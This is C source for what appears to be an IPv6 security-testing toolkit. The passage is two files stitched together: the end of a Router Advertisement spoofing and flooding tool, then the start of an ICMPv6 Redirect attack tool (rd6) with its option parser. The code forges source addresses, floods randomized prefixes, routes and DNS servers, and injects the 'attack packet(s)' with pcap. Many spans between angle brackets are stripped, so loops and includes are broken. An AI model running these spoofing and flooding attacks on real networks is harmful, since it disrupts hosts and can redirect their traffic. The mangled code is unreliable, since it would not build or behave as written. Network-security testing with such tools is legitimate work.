prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_router_advert)) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting Router Advertisement header (should be using Frag. option?)"); exit(EXIT_FAILURE); } ra= (struct nd_router_advert *) (ptr); ra->nd_ra_type = ND_ROUTER_ADVERT; ra->nd_ra_code = 0; ra->nd_ra_curhoplimit = curhop; ra->nd_ra_flags_reserved = managed_f | other_f | home_f | proxy_f | prefbits; ra->nd_ra_router_lifetime = htons(lifetime); ra->nd_ra_reachable = htonl(reachable); ra->nd_ra_retransmit = htonl(retrans); ptr += sizeof(struct nd_router_advert); /* If a single source link-layer address is specified, it is included in all packets */ if(sllopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_slla)) <= (v6buffer+idata->max_packet_size)){ sllaopt = (struct nd_opt_slla *) ptr; sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, linkaddr[0].a, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); } else{ puts("Packet too large while processing source link-layer addresss opt. (should be using Frag. option?)"); exit(EXIT_FAILURE); } } startofprefixes = ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Router Advertisement Message, and * send the attack packet(s). */ void send_packet(struct iface_data *idata, const u_char *pktdata){ if(pktdata==NULL){ sources=0; } else{ /* Sending a response to a Router Solicitation message */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* If the IPv6 Source Address of the incoming Router Solicitation is the unspecified address (::), the Router Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Router Advertisement is directed to the IPv6 Source Address (and Ethernet Source Address) of the incoming Router Solicitation message */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ if ( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ perror("inet_pton():"); exit(EXIT_FAILURE); } if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(ethernet->dst), ETHER_ADDR_LEN) == 0){ puts("ether_pton(): Error converting all-nodes link-local address"); exit(EXIT_FAILURE); } } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* If the Router Solicitation message was directed to a unicast address (unlikely), the IPv6 Source Address and the Ethernet Source Address of the Router Advertisement are set to the IPv6 Destination Address and the Ethernet Destination Address of the incoming Router Solicitation, respectively. Otherwise, the IPv6 Source Address and the Ethernet Source Address are set as specified by the command-line (or randomized). */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ ipv6->ip6_src = idata->srcaddr; ethernet->src = idata->hsrcaddr; sources=0; multicastdst_f=1; } else{ ipv6->ip6_src = pkt_ipv6->ip6_dst; ethernet->src = pkt_ether->dst; sources=nsources; multicastdst_f=0; } } do{ if(floods_f && (pktdata==NULL || (pktdata != NULL && multicastdst_f))){ /* Randomize the IPv6 Source address based on the specified prefix and prefix length (defaults to fe80::/64). */ randomize_ipv6_addr(&(ipv6->ip6_src), &(idata->srcaddr), idata->srcpreflen); if(!idata->hsrcaddr_f){ randomize_ether_addr(&(ethernet->src)); /* If the source-link layer address must be included, but no value was specified we set it to the randomized Ethernet Source Address */ if(sllopt_f && !sllopta_f){ memcpy(sllaopt->address, ethernet->src.a, ETH_ALEN); } } } prefixes= 0; routes= 0; dnsopts= 0; mtus=0; if(nlinkaddr==1) linkaddrs=1; else linkaddrs=0; do{ /* newdata_f handles the case where it is impossible for the packet to incorporate options, and hence this would result in and endless loop */ newdata_f=0; ptr = startofprefixes; while(linkaddrsmax_packet_size){ sllaopt = (struct nd_opt_slla *) ptr; sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, linkaddr[linkaddrs].a, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); linkaddrs++; newdata_f=1; } while(mtusmax_packet_size){ mtuopt= (struct nd_opt_mtu *) ptr; mtuopt->nd_opt_mtu_type = ND_OPT_MTU; mtuopt->nd_opt_mtu_len = MTU_OPT_LEN; mtuopt->nd_opt_mtu_reserved = 0; mtuopt->nd_opt_mtu_mtu = htonl(mtu[mtus]); ptr += sizeof(struct nd_opt_mtu); mtus++; newdata_f=1; } while(prefixesmax_packet_size)){ prefixopt = (struct nd_opt_prefix_info *) ptr; prefixopt->nd_opt_pi_type= ND_OPT_PREFIX_INFORMATION; prefixopt->nd_opt_pi_len= PREFIX_OPT_LEN; if(!floodp_f){ prefixopt->nd_opt_pi_flags_reserved= prefixflags[prefixes]; prefixopt->nd_opt_pi_prefix_len= prefixlen[prefixes]; prefixopt->nd_opt_pi_valid_time = htonl(prefixvalid[prefixes]); prefixopt->nd_opt_pi_preferred_time = htonl(prefixpref[prefixes]); prefixopt->nd_opt_pi_reserved2 = 0; prefixopt->nd_opt_pi_prefix = prefix[prefixes]; } else{ prefixopt->nd_opt_pi_flags_reserved= prefixflags[0]; prefixopt->nd_opt_pi_prefix_len= prefixlen[0]; prefixopt->nd_opt_pi_valid_time = htonl(prefixvalid[0]); prefixopt->nd_opt_pi_preferred_time = htonl(prefixpref[0]); prefixopt->nd_opt_pi_reserved2 = 0; endrand= (prefixlen[0]+31)/32; for(i=0; ind_opt_pi_prefix.s6_addr32[i]=random(); if(prefixlen[0]%32){ mask=0; for(i=0; i<(prefixlen[0]%32); i++) mask= (mask>>1) | 0x80000000; prefixopt->nd_opt_pi_prefix.s6_addr32[endrand-1]= \ prefixopt->nd_opt_pi_prefix.s6_addr32[endrand-1] & htonl(mask); } for(i=endrand;i<4;i++) prefixopt->nd_opt_pi_prefix.s6_addr32[i]=0; } ptr += sizeof(struct nd_opt_prefix_info); prefixes++; newdata_f=1; } while(routes < nroutes && (((ptr+ sizeof(struct nd_opt_route_info_l)) - v6buffer) \ <= idata->max_packet_size)){ routeopt = (struct nd_opt_route_info_l *) ptr; routeopt->nd_opt_ri_type=ND_OPT_ROUTE_INFORMATION; routeopt->nd_opt_ri_len= MAX_ROUTE_OPT_LEN; if(!floodr_f){ routeopt->nd_opt_ri_rsvd_pref_rsvd= routepref[routes]; routeopt->nd_opt_ri_prefix = route[routes]; routeopt->nd_opt_ri_prefix_len= routelen[routes]; routeopt->nd_opt_ri_lifetime = htonl(routelife[routes]); } else{ routeopt->nd_opt_ri_rsvd_pref_rsvd= routepref[0]; routeopt->nd_opt_ri_prefix_len= routelen[0]; routeopt->nd_opt_ri_lifetime = htonl(routelife[0]); endrand= (routelen[0]+31)/32; for(i=0; ind_opt_ri_prefix.s6_addr32[i]=random(); if(routelen[0]%32){ mask=0; for(i=0; i<(routelen[0]%32); i++) mask= (mask>>1) | 0x80000000; routeopt->nd_opt_ri_prefix.s6_addr32[endrand-1]= \ routeopt->nd_opt_ri_prefix.s6_addr32[endrand-1] & htonl(mask); } for(i=endrand;i<4;i++) routeopt->nd_opt_ri_prefix.s6_addr32[i]=0; } ptr += sizeof(struct nd_opt_route_info_l); routes++; newdata_f=1; } if(!floodd_f){ while(dnsopts < nrdnss && (((ptr+ sizeof(struct nd_opt_rdnss_l)\ + nrdnssopt[dnsopts] * sizeof(struct in6_addr) ) - v6buffer) <= idata->max_packet_size)){ dnsopt = (struct nd_opt_rdnss_l *) ptr; dnsopt->nd_opt_rdnss_type= ND_OPT_RDNSS; dnsopt->nd_opt_rdnss_len= (sizeof(struct nd_opt_rdnss_l) + nrdnssopt[dnsopts] \ * sizeof(struct in6_addr))/8; dnsopt->nd_opt_rdnss_lifetime= htonl(rdnsslife[dnsopts]); for(i=0; i< nrdnssopt[dnsopts]; i++) dnsopt->nd_opt_rdnss_addr[i] = rdnss[dnsopts][i]; ptr+= sizeof(struct nd_opt_rdnss_l) + sizeof(struct in6_addr) * nrdnssopt[dnsopts]; dnsopts++; newdata_f=1; } } else{ while(dnsopts < nrdnss){ smaxaddrs = (idata->max_packet_size - (ptr-v6buffer) - sizeof(struct nd_opt_rdnss_l))\ / sizeof(struct in6_addr); if(smaxaddrs>0){ dnsopt = (struct nd_opt_rdnss_l *) ptr; dnsopt->nd_opt_rdnss_type= ND_OPT_RDNSS; dnsopt->nd_opt_rdnss_lifetime= htonl(rdnsslife[0]); for(i=0; ind_opt_rdnss_addr[i].s6_addr[j]=random(); dnsopt->nd_opt_rdnss_len= (sizeof(struct nd_opt_rdnss_l) + \ i * sizeof(struct in6_addr))/8; ptr+= sizeof(struct nd_opt_rdnss_l) + sizeof(struct in6_addr) * i; newdata_f=1; } } } ra->nd_ra_cksum = 0; ra->nd_ra_cksum = in_chksum(v6buffer, ra, ptr-((unsigned char *)ra), IPPROTO_ICMPV6); if(!idata->fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } } }while( (linkaddrs>nlinkaddr || mtus\n" "Please send any bug reports to " ); } /* * Function: print_attack_info() * * Print attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(!floods_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (automatically-selected)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: automatically-selected"); } /* Ethernet Destination Address only used if a target IPv6 address or a target Ethernet * address were specified */ if(idata->dstaddr_f || idata->hdstaddr_f){ if(ether_ntop(&(idata->hdstaddr), phdstaddr, sizeof(phdstaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", phdstaddr, \ ((!idata->hdstaddr_f)?" (all-nodes multicast)":"")); } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f && !(idata->srcprefix_f)){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (automatically-selected)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } /* IPv6 Destination Address is only used if a target IPv6 address or a target Ethernet * address were specified */ if(idata->dstaddr_f || idata->hdstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ perror("inet_ntop()"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, \ ((!idata->dstaddr_f)?" (all-nodes link-local multicast)":"")); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; ifragh_f) printf("Sending each packet in fragments of %u bytes (plus the Unfragmentable part)\n", nfrags); printf("Cur Hop Limit: %u Preference: %d Flags: %s%s%s%s%s Router Lifetime: %u\n", \ curhop, preference, ((managed_f)?"M":""), ((other_f)?"O":""), ((home_f)?"H":""), \ ((proxy_f)?"P":""), ((!managed_f && !other_f && !home_f && !proxy_f)?"none":""), \ lifetime); printf("Reachable Time: %u Retrans Timer: %u\n", reachable, retrans); for(i=0;i Address: %s\n", \ ((floods_f && !sllopta_f)?"(randomized for each packet)":plinkaddr)); } for(i=0;i MTU: %u\n", mtu[i]); if(!floodp_f){ for(i=0; i"); if(inet_ntop(AF_INET6, &prefix[i], pprefix, sizeof(pprefix)) == NULL){ perror("inet_ntop()"); exit(EXIT_FAILURE); } printf("Prefix: %s/%u\tFlags: %s%s%s%s ", pprefix, prefixlen[i], \ ((prefixflags[i] & ND_OPT_PI_FLAG_ONLINK)?"L":""),\ ((prefixflags[i] & ND_OPT_PI_FLAG_AUTO)?"A":""), \ ((prefixflags[i] & ND_OPT_PI_FLAG_RADDR)?"R":""), \ ((!prefixflags[i])?"none":"")); printf("Valid Lifetime: %u Preferred Lifetime: %u\n", prefixvalid[i], prefixpref[i]); } } else{ printf("Flooding the target with %u prefixes\n", nprefixes); printf("Prefix: (randomized)/%u%s Flags: %s%s%s%s ", prefixlen[0], (prefopt_f?"":" (default)"),\ ((prefixflags[0] & ND_OPT_PI_FLAG_ONLINK)?"L":""),\ ((prefixflags[0] & ND_OPT_PI_FLAG_AUTO)?"A":""), \ ((prefixflags[0] & ND_OPT_PI_FLAG_RADDR)?"R":""), \ ((!prefixflags[0])?"none":"")); printf("Valid Lifetime: %u Preferred Lifetime: %u\n", prefixvalid[0], prefixpref[0]); } if(!floodr_f){ for(i=0; i"); if(inet_ntop(AF_INET6, &route[i], pprefix, sizeof(pprefix)) == NULL){ perror("inet_ntop()"); exit(EXIT_FAILURE); } printf("Prefix: %s/%u Preference: %u Lifetime: %u\n", pprefix, routelen[i], \ (routepref[i]>>3), routelife[i]); } } else{ printf("Flooding the target with %u Route Information options\n", nroutes); printf("Prefix: (randomized)/%u Preference: %u Lifetime: %u\n", routelen[0], \ (routepref[0]>>3), routelife[i]); } if(!floodd_f){ for(i=0;i"); printf("Lifetime: %u Addresses: ", rdnsslife[i]); for(j=0;j * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make rd6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "rd6.h" #include "libipv6.h" #include "ipv6toolkit.h" /* Function prototypes */ void init_packet_data(struct iface_data *); void send_packet(struct iface_data *, const u_char *, struct pcap_pkthdr *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); /* Flags used for the ICMPv6 Redirect (specifically) */ unsigned int rediraddr_f=0, redirprefix_f=0, redirport_f=0, peeraddr_f=0, peerport_f=0; unsigned int rhtcp_f=0, rhudp_f=0, rhicmp6_f=0, norheader_f=0, rheader_f=0; unsigned int tcpseq_f=0, tcpack_f=0, tcpurg_f=0, tcpflags_f=0, tcpwin_f=0; unsigned int icmp6id_f=0, icmp6seq_f=0; unsigned int rhlength_f=0, floodr_f=0, respmcast_f=0, makeonlink_f=0; unsigned int ip6hoplimit_f=0, ip6length_f=0, rhdefault_f=0; unsigned int learnrouter_f=0, sanityfilters_f=0; /* Variables used for ICMPv6 Redirect (specifically) */ uint16_t ip6length; struct in6_addr rediraddr, peeraddr; unsigned char redirpreflen, targetpreflen; uint16_t redirport, peerport, tcpurg, tcpwin, icmp6id, icmp6seq; uint32_t tcpseq, tcpack; uint8_t tcpflags=0, ip6hoplimit; struct ip6_hdr *rhipv6; struct udp_hdr *rhudp; struct tcp_hdr *rhtcp; struct icmp6_hdr *rhicmp6; unsigned int nredirs, redirs; unsigned int rhbytes, rhlength, currentsize; unsigned char rh_hoplimit; struct nd_opt_rd_hdr *rh; unsigned char rhbuff[100]; /* This one must be able to hold the IPv6 header and the upper layer header */ /* Variables used for learning the default router */ struct ether_addr router_ether, rs_ether; struct in6_addr router_ipv6, rs_ipv6; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct nd_redirect *rd; struct ether_header *ethernet; struct nd_opt_tlla *tllaopt; struct in6_addr targetaddr; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int ntargets, sources, nsources, targets, nsleep; uint16_t mask; uint8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char floodt_f=0, targetaddr_f=0, useaddrkey_f=0; unsigned char multicastdst_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char tllaopt_f=0, tllaopta_f=0, targetprefix_f=0, hoplimit_f=0; unsigned char newdata_f=0, floods_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct iface_data idata; struct filters filters; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ int r, sel; fd_set sset, rset; #if defined(sun) || defined(__sun) || defined(__linux__) struct timeval timeout; #endif struct target_ipv6 targetipv6; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"add-target-opt", no_argument, 0, 'e'}, {"target-addr-opt", required_argument, 0, 'E'}, {"redir-dest", required_argument, 0, 'r'}, {"redir-target", required_argument, 0, 't'}, {"payload-type", required_argument, 0, 'p'}, {"payload-size", required_argument, 0, 'P'}, {"no-payload", no_argument, 0, 'n'}, {"ipv6-hlim", required_argument, 0, 'c'}, {"peer-addr", required_argument, 0, 'x'}, {"redir-port", required_argument, 0, 'o'}, {"peer-port", required_argument, 0, 'a'}, {"tcp-flags", required_argument, 0, 'X'}, {"tcp-seq", required_argument, 0, 'q'}, {"tcp-ack", required_argument, 0, 'Q'}, {"tcp-urg", required_argument, 0, 'V'}, {"tcp-win", required_argument, 0, 'w'}, {"resp-mcast", no_argument, 0, 'M'}, {"make-onlink", no_argument, 0, 'O'}, {"learn-router", no_argument, 0, 'N'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"sanity-filters", no_argument, 0, 'f'}, {"flood-dests", required_argument, 0, 'R'}, {"flood-targets", required_argument, 0, 'T'}, {"flood-sources", required_argument, 0, 'F'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:eE:r:t:p:P:nc:x:o:a:X:q:Q:V:w:MONj:k:J:K:b:g:B:G:fR:T:F:lz:Lvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.iface_f=1; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } if(idata.srcpreflen == 64) useaddrkey_f= 1; sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &idata.hsrcaddr, sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &idata.hdstaddr, sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'e': /* Add target link-layer option */ tllaopt_f = 1; break; 